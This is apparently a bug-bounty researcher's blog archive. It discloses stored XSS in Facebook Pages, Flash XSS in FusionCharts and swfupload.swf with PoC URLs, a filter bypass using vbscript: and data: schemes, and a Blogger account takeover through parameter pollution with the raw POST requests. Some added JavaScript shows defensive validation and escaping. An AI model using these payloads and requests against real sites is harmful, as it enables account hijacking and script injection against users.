<div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">First of all, I must mention that discovering stored XSS issues in <a href="http://facebook.com/" target="_blank">facebook.com</a> is quite rare these days,</span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">For a start, I would like to present the steps I took to make this stored XSS work,</span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">Currently, if you want to create a page (<a href="http://facebook.com/pages/create.php" target="_blank">facebook.com/pages/create.php</a>) with a malicious page name (JavaScript payload), you get blocked by an automated system:</span></div><br />
<div style="direction: ltr;"></div><div class="separator" style="clear: both; text-align: center;"><span style="font-family: arial,sans-serif; font-size: 13px;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWsX5nLv1Ncd5DI7CM5mPA1vBWUOJLWm3UduELt9LpRLm_fTKQvOFl3vgW3OWZc7Jbat8e-bmrbhseQCifqc-syp9SOCJeBKfzu4rIg-WdR_UX7LULwvBNz_Z7nS96YSi8UDazLj0TO0Q/s1600/pagenameblocked.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWsX5nLv1Ncd5DI7CM5mPA1vBWUOJLWm3UduELt9LpRLm_fTKQvOFl3vgW3OWZc7Jbat8e-bmrbhseQCifqc-syp9SOCJeBKfzu4rIg-WdR_UX7LULwvBNz_Z7nS96YSi8UDazLj0TO0Q/s320/pagenameblocked.jpg" width="320" /></a></span></div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;"> (I'm "sure" there might be a bypass, I didn't spend time to test it yet).<b> </b></span><br />
<br />
<span style="font-family: arial,sans-serif; font-size: 13px;"><b>1.</b> I was able to use another feature to bypass the protection and therefore change the page title, namely the Facebook API for updating page attributes (<a href="https://developers.facebook.com/docs/reference/api/page/#page_access_tokens" target="_blank">https://developers.facebook.com/docs/reference/api/page/#page_access_tokens</a>) (the Pages API is just a hint :)),</span></div><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">In this case, I changed my page title to a "malicious" JavaScript payload (&lt;img src="xx.jpg"onerror=alert(6)&gt;),</span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;"> </span><br />
<div style="direction: ltr;"><span style="font-family: arial, sans-serif;"><br />
</span></div><div style="direction: ltr;"><b><span style="font-family: arial,sans-serif; font-size: 13px;">2.</span></b><span style="font-family: arial,sans-serif; font-size: 13px;"> In Facebook Pages, you can add an application to your page by using the Add To A Page box:</span></div><br />
<div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">(<a href="https://www.facebook.com/add.php?api_key=xxx&pages=1&page=xxxx" target="_blank">https://www.facebook.com/add.php?api_key=xxx&pages=1&page=xxxx</a>)</span><br />
<br />
</div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div class="separator" style="clear: both; text-align: center;"><span style="font-family: arial,sans-serif; font-size: 13px;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW0BKBG_DXZF8k7o36jgqauk7-eaVrksR6Jk11jdhcVEu1AtERxCw48rcncrHexLw-CxY4fYGT87UWVECzQGppqdac5ZdzUUptk8DvnQkDqBVrufvySlIXv6dnzlIz5t5Rd4m1oUGtkaM/s1600/addpage.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW0BKBG_DXZF8k7o36jgqauk7-eaVrksR6Jk11jdhcVEu1AtERxCw48rcncrHexLw-CxY4fYGT87UWVECzQGppqdac5ZdzUUptk8DvnQkDqBVrufvySlIXv6dnzlIz5t5Rd4m1oUGtkaM/s320/addpage.jpg" width="320" /></a></span></div><div style="direction: ltr;"></div><br />
<div style="direction: ltr;"><span style="font-family: arial, sans-serif;"><br />
</span></div><span style="font-family: arial,sans-serif; font-size: 13px;"></span><br />
<div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">When you add a tab to your page, Facebook displays the pages you own or manage by the title of each page,</span></div><br />
<div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">As a result, I was able to execute a stored XSS (Facebook didn't filter the page title),</span></div><br />
<div style="direction: ltr;"></div><div class="separator" style="clear: both; text-align: center;"><span style="font-family: arial,sans-serif; font-size: 13px;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4ZsYowMxBHHP8cHNGaDvLY1S60Mycj-Ovmt-PCt3WNqtFm1vk3kiKOJK1KlDDAeoUudYgmJRwhuW0cLlVsaMs6nzR6J4nqCWToavm4bE1uLGf9Ll8lq_ZIsbeXecYIPYq-gkZE5XXKuk/s1600/facebookpagetabxss.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4ZsYowMxBHHP8cHNGaDvLY1S60Mycj-Ovmt-PCt3WNqtFm1vk3kiKOJK1KlDDAeoUudYgmJRwhuW0cLlVsaMs6nzR6J4nqCWToavm4bE1uLGf9Ll8lq_ZIsbeXecYIPYq-gkZE5XXKuk/s320/facebookpagetabxss.jpg" width="320" /></a></span></div><div style="direction: ltr;"></div><br />
<div style="direction: ltr;"><span style="font-family: arial, sans-serif;"><br />
</span></div><span style="font-family: arial,sans-serif; font-size: 13px;"></span><br />
<div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">At this point it seems to be only a self stored XSS, but in Facebook Pages you can use the Admin Roles settings to add admins to your Page.</span></div><span style="font-family: arial,sans-serif; font-size: 13px;"> In this situation, I added the victim as an administrator of my "malicious page". The victim didn't need to accept this admin request; he was added to my Page automatically,</span><span style="font-family: arial,sans-serif; font-size: 13px;"> so I was able to exploit this XSS by sending a single link to the victim:</span><br />
<br />
<a href="https://www.facebook.com/add.php?api_key=124024574287414&pages=1&page=attackerpageid" target="_blank">https://www.facebook.com/add.<wbr></wbr>php?api_key=124024574287414&<wbr></wbr>pages=1&page=attackerpageid</a><a href="https://www.facebook.com/add.php?api_key=124024574287414&pages=1&page=attackerpageid" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank"><br />
</a></div><div dir="rtl"><div style="direction: ltr;"><span style="font-family: arial, sans-serif;"><br />
</span></div><div style="direction: ltr;"><span style="font-family: arial, sans-serif;">PoC Image:</span></div><div style="direction: ltr;"><span style="font-family: arial, sans-serif;"><br />
</span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4ZsYowMxBHHP8cHNGaDvLY1S60Mycj-Ovmt-PCt3WNqtFm1vk3kiKOJK1KlDDAeoUudYgmJRwhuW0cLlVsaMs6nzR6J4nqCWToavm4bE1uLGf9Ll8lq_ZIsbeXecYIPYq-gkZE5XXKuk/s1600/facebookpagetabxss.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4ZsYowMxBHHP8cHNGaDvLY1S60Mycj-Ovmt-PCt3WNqtFm1vk3kiKOJK1KlDDAeoUudYgmJRwhuW0cLlVsaMs6nzR6J4nqCWToavm4bE1uLGf9Ll8lq_ZIsbeXecYIPYq-gkZE5XXKuk/s320/facebookpagetabxss.jpg" width="320" /></a></div><div style="direction: ltr;"><span style="font-family: arial, sans-serif;"><br />
</span></div><span style="font-family: arial,sans-serif; font-size: 13px;"></span><br />
<div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">PoC Video</span></div><span style="font-family: arial,sans-serif; font-size: 13px;"> </span><br />
<div style="direction: ltr;"></div><div class="separator" style="clear: both; text-align: center;"><span style="font-family: arial,sans-serif; font-size: 13px;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/n6cXSFJ7LcA?feature=player_embedded' frameborder='0'></iframe></span></div><div style="direction: ltr;"></div><div style="direction: ltr;"><span style="font-family: arial, sans-serif;"> </span></div><div style="direction: ltr;"><span style="font-family: arial, sans-serif;"> </span></div><span style="font-family: arial,sans-serif; font-size: 13px;"></span> <div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">Regards,</span></div><span style="font-family: arial,sans-serif; font-size: 13px;"> </span> <div style="direction: ltr;"><span style="font-family: arial, sans-serif;"> </span></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">Nir</span></div></div></div>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-1025468663370994513.post-30986217799985516492013-01-01T07:14:00.002-08:002013-01-14T05:47:52.486-08:00FusionChart 2013 Flash New Attacking Vectors<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
My findings about FusionCharts vulnerabilities:</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtbMOkTA_XcaO9ptT9ZBOt2qhG6PO3e83MZ2LQ6JoZQJ_4lcVwEtYuGv_i9L7D8TMiaGAwwtByT092ULTHM4lLMgKeJi-rz62i3ScgsWnOj1FAiC7vDJpJvmMsPTyvRI13phK4XS4HqCw/s1600/fusioncharts-xt-banner.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="93" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtbMOkTA_XcaO9ptT9ZBOt2qhG6PO3e83MZ2LQ6JoZQJ_4lcVwEtYuGv_i9L7D8TMiaGAwwtByT092ULTHM4lLMgKeJi-rz62i3ScgsWnOj1FAiC7vDJpJvmMsPTyvRI13phK4XS4HqCw/s320/fusioncharts-xt-banner.jpg" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<br /><span style="color: #666666;">A)</span> I found that an attacker is able to execute XSS attacks by loading an external XML file via the dataUrl parameter,<br /><br />This parameter expects a valid configuration file used to display graph data in FusionCharts,<br /><br />In this case, an attacker is able to use the link parameter (http://docs.fusioncharts.com/charts/contents/DrillDown/LinkFormat.html) to execute JavaScript payloads on the client,<br />for example (click the graph for the XSS PoC):<br /><br />http://nirgoldshlager.site50.net/Column3D.swf?dataURL=http://files.nirgoldshlager.com/Data.xml<br /><br />When the victim clicks on the malicious graph, the XSS payload runs on his client,<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaBAQgegKpQp6Z-hdYtt2_zelzAXStkW-GlOHcoJuLQnLA6hKw2MGOdnmVwGd-bUWJKSalIBpzklrfxAbYW3MNbD0ERk7sQEJnA1TIz1Uai_OcWW6RvgN7oVTZA48xYhI4gkWxc83fE84/s1600/ClicforXSS.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaBAQgegKpQp6Z-hdYtt2_zelzAXStkW-GlOHcoJuLQnLA6hKw2MGOdnmVwGd-bUWJKSalIBpzklrfxAbYW3MNbD0ERk7sQEJnA1TIz1Uai_OcWW6RvgN7oVTZA48xYhI4gkWxc83fE84/s320/ClicforXSS.jpg" width="320" /></a></div>
<div>
<br /><br /><span style="color: #666666;">B)</span> An attacker is able to perform a redirection attack (new tab) in Firefox. This can be done by using the LogoURL parameter,<br /><br />This parameter allows an attacker to load an external SWF file,<br />To perform a redirection attack, the attacker uses the req.send function in ActionScript from his malicious SWF file,<br /><br />Req.send function:<br />(req.send("http://nirgoldshlager.com", "_blank", "GET");),<br /><br /><b>PoC:</b><br /><br /><a href="http://nirgoldshlager.site50.net/Column3D.swf?dataURL=http://files.nirgoldshlager.com/Data.xml">http://nirgoldshlager.site50.net/Column3D.swf?dataURL=http://files.nirgoldshlager.com/Data.xml</a> <br /><br /><b>Solution:</b><br /><br />
Cross Domain Policy file:<br /><br />
http://www.adobe.com/devnet-docs/acrobatetk/tools/AppSec/CrossDomain_PolicyFile_Specification.pdf <br /><br />What about the anti-XSS regex in the ActionScript?<br /><br /> We all remember the old debugmode=1 bug in FusionCharts, right :)?<br /><br />I have examined the FusionCharts ActionScript and discovered that it makes a poor attempt at blocking cross-site scripting attacks, using a regex to match dangerous XSS attempts.<br /><br />The FusionCharts ActionScript tries to block the dataUrl=XXX XSS attack with a poor regex that only looks for the javascript/asfunction keywords; don't let the colon ":" check trick you ;) that check is only performed when javascript/asfunction is detected.<br /><br /><br /><b>Line 126-128:</b><br /><br />function filterXSSChars(strURL)<br />{<br /> if (_isOnline == true && ((strURL.toLowerCase().indexOf("javascript") != -1 || strURL.toLowerCase().indexOf("asfunction") != -1) && (strURL.indexOf(":") != -1 || strURL.indexOf("%3A") != -1)))<br /><br />An attacker is able to bypass this regex easily in IE by using vbscript instead of javascript,</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4KN-vRlIwfrrJBrDclUGfWA4wNMnOjll50PgfjmiT8SwuPB6YGli2NQPyStdwvClLu2TGvyUJg4CGVqyMihfXmDs71q9OJvTrtx9tZm2ieGpzJYTDKrvelO8cjFBufTMIazB6HVu81tc/s1600/VBSCRIPT+XSS+POOR+REGEX.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4KN-vRlIwfrrJBrDclUGfWA4wNMnOjll50PgfjmiT8SwuPB6YGli2NQPyStdwvClLu2TGvyUJg4CGVqyMihfXmDs71q9OJvTrtx9tZm2ieGpzJYTDKrvelO8cjFBufTMIazB6HVu81tc/s320/VBSCRIPT+XSS+POOR+REGEX.jpg" width="320" /></a></div>
<div>
<br /><br /><br /><b>PoC:</b><br /><br /><a href="http://nirgoldshlager.site50.net/MSLinelatest.swf?debugMode=1&dataURL=%27%3E%3Ca%20href=%27vbscript:alert%286%29%27%3E%3Cfont%20size=%22100%22%20%3EClick%20Me%20For%20XSS%3C/font%3E%3C/a%3E%3C%3E">http://nirgoldshlager.site50.net/MSLinelatest.swf?debugMode=1&dataURL=%27%3E%3Ca%20href=%27vbscript:alert%286%29%27%3E%3Cfont%20size=%22100%22%20%3EClick%20Me%20For%20XSS%3C/font%3E%3C/a%3E%3C%3E</a><br /><br /><br />You can also use data:text/html; to bypass it, or mocha/livescript for older versions of Netscape,<br /><br />The correct solution might be:<br /><br />asfunction|javascript|vbscript|data|mocha|livescript|feed|pcast (Thanks to @irsdl for the feed tip, and @Milad_Bahari for pcast; the feed and pcast XSS work on some older versions of Firefox)<br /><ol style="text-align: left;">
</ol>
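To make the gap concrete, here is an added example in JavaScript (not FusionCharts code, and not part of the original post): the keyword check quoted above, transliterated from the ActionScript, next to an allowlist validator that only accepts absolute http/https URLs on hosts the deployment expects to serve chart data from. The host names are made up for the example; the first sample values are the payload shapes shown in this post.

```javascript
// Added example (not FusionCharts code): the keyword check quoted in the post,
// transliterated to JavaScript, beside an allowlist validator for URL-bearing
// chart parameters such as dataURL, defaultDataFile and logoURL.

// Re-creation of the weak filterXSSChars() condition described above. It only
// fires when "javascript" or "asfunction" is present AND a colon (or %3A) is
// present, so every other scheme (vbscript:, data:, mocha:, ...) passes.
function weakFilterBlocks(strURL, isOnline = true) {
  const lower = strURL.toLowerCase();
  const hasKeyword = lower.indexOf("javascript") !== -1 || lower.indexOf("asfunction") !== -1;
  const hasColon = strURL.indexOf(":") !== -1 || strURL.indexOf("%3A") !== -1;
  return isOnline && hasKeyword && hasColon;
}

// Percent-decode until the value stops changing (bounded), so "%6Aavascript:"
// or "javascript%3A" cannot hide the scheme; a malformed encoding is rejected.
function fullyDecode(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let decoded;
    try {
      decoded = decodeURIComponent(current);
    } catch (e) {
      return null; // malformed %-sequence: treat as hostile
    }
    if (decoded === current) return current;
    current = decoded;
  }
  return current;
}

// Allowlist validator: the value must parse as an absolute http(s) URL whose
// host is one the deployment serves chart data from. Relative paths, every
// other scheme, and unknown hosts all fail closed.
function isAllowedDataUrl(raw, allowedHosts) {
  const decoded = fullyDecode(String(raw));
  if (decoded === null) return false;
  let url;
  try {
    url = new URL(decoded); // no base URL: a relative value throws here
  } catch (e) {
    return false;
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return false;
  return allowedHosts.includes(url.hostname.toLowerCase());
}

// Stand-alone demonstration. The first samples are the shapes quoted in the
// post; the host names are constructed for this example.
const ALLOWED_HOSTS = ["files.example.com"];
const SAMPLES = [
  "javascript:alert(1)",
  "'><a href='vbscript:alert(6)'>Click Me For XSS</a>",
  "data:text/html,hello",
  "javascript%3Aalert(1)",
  "http://files.example.com/Data.xml",
  "http://evil.example.net/Data.xml",
];
for (const s of SAMPLES) {
  console.log(JSON.stringify(s), "weak check blocks:", weakFilterBlocks(s),
    "allowlist accepts:", isAllowedDataUrl(s, ALLOWED_HOSTS));
}
```

The allowlist approach is preferable to growing the scheme denylist (vbscript, data, mocha, ...) because an unexpected or encoded scheme fails closed instead of slipping past; the bounded decoding loop is there so a value such as javascript%3A... cannot hide its colon from the check, which is exactly what the colon test in the quoted code relies on.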
<div style="text-align: left;">
<br /></div>
As discovered by security researcher "Ben Hayak" (@benhayak),<br />a new parameter (defaultDataFile) has been revealed which is vulnerable to a new XSS attack.<br /><br />There is another parameter called defaultDataFile; this parameter can be used to trigger another XSS in case the dataURL parameter is protected/blocked<br /><br />Line 125:<br /><br />var _defaultDataFile = unescape(getFirstValue(rootAttr.defaultdatafile, "Data.xml"));<br /><br />We can use this parameter to execute an XSS attack,</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3B9GQuPQO7i1hmkfGEt45aM-DzOWu5kmgr1r5SsIECwqG-RbYYJY1L3ACoI7DtkK7hhag4_tgKPlkOffEtQaAp8IEQK57vMfS4Vws4PWPPiY7Q5xXMlqQCoEej-5MJk5m6ucfxI97rmI/s1600/BENISSUE.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3B9GQuPQO7i1hmkfGEt45aM-DzOWu5kmgr1r5SsIECwqG-RbYYJY1L3ACoI7DtkK7hhag4_tgKPlkOffEtQaAp8IEQK57vMfS4Vws4PWPPiY7Q5xXMlqQCoEej-5MJk5m6ucfxI97rmI/s320/BENISSUE.jpg" width="320" /></a></div>
<div>
<br /><br /><b>PoC:</b><br /><br /><a href="http://nirgoldshlager.site50.net/MSLinelatest.swf?debugMode=1&defaultDataFile=%27%3E%3Ca%20href=%27javascript:alert%286%29%27%3E%3Cfont%20size=%22100%22%20%3EClick%20Me%20For%20XSS%3C/font%3E%3C/a%3E%3C%3E">http://nirgoldshlager.site50.net/MSLinelatest.swf?debugMode=1&defaultDataFile=%27%3E%3Ca%20href=%27javascript:alert%286%29%27%3E%3Cfont%20size=%22100%22%20%3EClick%20Me%20For%20XSS%3C/font%3E%3C/a%3E%3C%3E</a><ol style="text-align: left;">
</ol>
</div>
</div>
Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-1025468663370994513.post-90275717826129993412012-12-09T13:50:00.000-08:002013-01-14T08:32:39.534-08:00swfupload.swf XSS<div dir="ltr" style="text-align: left;" trbidi="on">
Hi,<br />
<br />
Just want to share my finding,<br />
<br />
I found another XSS Vulnerability in swfupload.swf<br />
<br />
<br />
PoC:<br />
<br />
<a href="http://demo.swfupload.org/v220/swfupload/swfupload.swf?buttonText=%3Ca%20href=%22javascript:alert%28top.location%29%22%3EClick+For+XSS%20%3Cfont%20size=%2216%22%3E%3C/a%3E">http://demo.swfupload.org/v220/swfupload/swfupload.swf?buttonText=%3Ca%20href=%22javascript:alert%28top.location%29%22%3EClick+For+XSS%20%3Cfont%20size=%2216%22%3E%3C/a%3E</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRgEI-TW4if2LHzDJ7W_E1biYY-doO2gO9hZ-9Cm1pYJ24u7Um6jbRGaXzbXhWX8EkUeh6Z3aCjiBmRu_rjEyVcKlNbrlw9Vt1uIkOspFYHPdwMSEN8O0EUpMHBeookcroPoHrxx5hlU4/s1600/swfuploadxss.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRgEI-TW4if2LHzDJ7W_E1biYY-doO2gO9hZ-9Cm1pYJ24u7Um6jbRGaXzbXhWX8EkUeh6Z3aCjiBmRu_rjEyVcKlNbrlw9Vt1uIkOspFYHPdwMSEN8O0EUpMHBeookcroPoHrxx5hlU4/s320/swfuploadxss.jpg" width="320" /></a></div>
<br />
<br />
<br />
Vulnerable Parameter:<br />
<br />
buttonText<br />
<br />
Vulnerable Code:<br />
<br />
this.buttonTextField.htmlText = this.buttonText;<br />
<br />
<br />
<br />
(For WordPress fans: works on version 3.3.1 and below)<br />
<br />
<br />
Enjoy...</div>
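This swfupload finding and the Facebook Page title XSS above share the same sink: user-controlled text assigned into something that interprets HTML (htmlText here, the add-tab dialog there). As an added example in JavaScript, not code from SWFUpload or Facebook, here is that unsafe pattern next to an escaped rendering of the same values; the titles are constructed for the example.

```javascript
// Added example (not SWFUpload's or Facebook's code): untrusted text dropped
// into an HTML-interpreting sink, beside the same rendering with output encoding.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode the five characters that can change HTML structure or attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: mirrors `htmlText = buttonText` and an unescaped Page title in a
// dialog. Any markup inside a title becomes part of the rendered document.
function renderPageListUnsafe(titles) {
  return "<ul>" + titles.map((t) => "<li>" + t + "</li>").join("") + "</ul>";
}

// Hardened: every title is encoded before concatenation, so the output
// contains exactly the renderer's own tags and none from the input.
function renderPageListSafe(titles) {
  return "<ul>" + titles.map((t) => "<li>" + escapeHtml(t) + "</li>").join("") + "</ul>";
}

// Counts tags in rendered output; a safe renderer yields only its own tags,
// which is an easy property to assert in a unit test.
function countTags(html) {
  return (html.match(/<[a-zA-Z\/][^>]*>/g) || []).length;
}

// Constructed titles: one benign, one carrying the kind of link the post shows.
const TITLES = ["My Page", '<a href="javascript:alert(1)">Click me</a> & friends'];

console.log("unsafe:", renderPageListUnsafe(TITLES), "tags:", countTags(renderPageListUnsafe(TITLES)));
console.log("safe:  ", renderPageListSafe(TITLES), "tags:", countTags(renderPageListSafe(TITLES)));
```

In ActionScript the equivalent fix for the vulnerable line above is to assign untrusted strings to TextField.text instead of htmlText, so the value is displayed verbatim rather than parsed as markup.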
Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-1025468663370994513.post-83572190878468793752012-06-13T06:21:00.004-07:002013-02-27T22:07:30.792-08:00<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Killing a bounty program, Twice (HITB 2012 Slides) by Nir Goldshlager, Itzhak (Zuk)<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="356" marginheight="0" marginwidth="0" mozallowfullscreen="" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/13295409" style="border-width: 1px 1px 0; border: 1px solid #CCC; margin-bottom: 5px;" webkitallowfullscreen="" width="427"> </iframe> <br />
<div style="margin-bottom: 5px;">
<b> <a href="http://www.slideshare.net/goldshlager19/nir-goldshlager-killing-a-bug-bounty-program-twice-hack-in-the-box-2012" target="_blank" title="Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012">Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012</a> </b> from <b><a href="http://www.slideshare.net/goldshlager19" target="_blank">Nir Goldshlager</a></b><br />
<b> </b> </div>
<b>1.</b><br />
<br />
Google Picnik File Inclusion (Shell on Google server), The Picnik is Over!<br />
<br />
<b>2.</b><br />
<br />
Google Affiliate Network, hijack any user account via a permission vulnerability,<br />
<br />
<b>3.</b><br />
<br />
XSS in blogger.com<br />
<br />
<br />
<b>PoC Videos:</b><br />
<br />
<br />
<b>Google Books DOM XSS:</b><br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/VD3nMsAF1HY?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
<br />
<b>Google Calendar Stored XSS: </b><br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/2MtAQil9kKs?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
<br />
<br />
<b>Google Analytics, Cool Stored XSS: </b><br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/2wyJOlTfmaA?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
<br />
<br />
<b>Google Friend Connect Stored XSS: </b><br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/NZK43_OPuFI/0.jpg" height="266" width="320"><param name="movie" value="http://www.youtube.com/v/NZK43_OPuFI?version=3&f=user_uploads&c=google-webdrive-0&app=youtube_gdata" /><param name="bgcolor" value="#FFFFFF" /><param name="allowFullScreen" value="true" /><embed width="320" height="266" src="http://www.youtube.com/v/NZK43_OPuFI?version=3&f=user_uploads&c=google-webdrive-0&app=youtube_gdata" type="application/x-shockwave-flash" allowfullscreen="true"></embed></object></div>
<br />
<br />
<br />
<br />
<b>Google Knol, access to private docs using the Google Knol Translator Tool: </b><br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/Tuv8ZYgNqp0?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
<br />
<br />
<b>Google Feedburner Stored XSS:</b><br />
<br />
<br />
<br />
<br />
<b> </b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/ShA6ojZHAOQ?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
<br />
<br />
To be continued ;)
Enjoy....</div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-1025468663370994513.post-1806810802455435322011-03-10T02:07:00.000-08:002013-04-04T21:56:59.025-07:00How I Hacked Any Blogger Account <div dir="ltr" style="text-align: left;" trbidi="on"><meta content='0;url=http://www.breaksec.com/?p=5691' http-equiv='refresh'/> <br />
Hi,<br />
<br />
This is my first post on my blog, and also my first post regarding the security vulnerabilities I found in the Google Reward Program,<br />
<br />
In the last 2 months I participated in the Google reward program and found some high-severity, serious vulnerabilities,<br />
<br />
(First, I want to mention that Google has the best professional, brilliant security team. It's amazing how much Google cares about security and what an amazing job they do securing their sites. Thanks Adam and the Google Security Team for giving me the chance to show my skills :))<br />
<br />
The vulnerability that I want to share first is a critical vulnerability in Blogger (a Google service),<br />
<br />
That vulnerability could be used by an attacker to get administrator privileges over any Blogger account (permission issue),<br />
<br />
Yes, I know it sounds kind of crazy, but it's true :),<br />
<br />
Here are the details regarding the issue in Blogger service,<br />
<br />
I found an HTTP Parameter Pollution vulnerability in Blogger that allows an attacker to add himself as an administrator on the victim's Blogger account,<br />
<br />
Technical details:<br />
<br />
Here are the steps for getting admin permissions over any Blogger account.<br />
<br />
1.<br />
<br />
The attacker uses the invite author option in Blogger (add authors):<br />
<br />
Vulnerability location:<br />
<br />
POST /add-authors.do HTTP/1.1<br />
Request:<br />
<br />
security_token=attackertoken&amp;blogID=attackerblogidvalue&amp;blogID=victimblogidvalue&amp;authorsList=goldshlager19test%40gmail.com(attacker email)&amp;ok=Invite<br />
As you can see, I added two blogID values to my POST request (blogID=attackerblogidvalue&amp;blogID=victimblogidvalue)<br />
<br />
<br />
The server checks the first blogID value and then executes the request with the second blogID value supplied by the attacker<br />
<br />
<br />
2.<br />
<br />
After that the attacker receives an e-mail to confirm him as an author (author invitation link),<br />
After that, the attacker is added as an author on the victim's account.<br />
<br />
<br />
3.<br />
<br />
At this step it becomes possible to modify the attacker's permission from author to administrator,<br />
Vulnerability Location:<br />
POST /team-member-modify.do HTTP/1.1<br />
Request:<br />
security_token=attackertoken&amp;blogID=attackerownblogid&amp;blogID=victimblogidvalue&amp;memberID=attackermemberid&amp;isAdmin=true&amp;ok=Grant+admin+privileges<br />
<br />
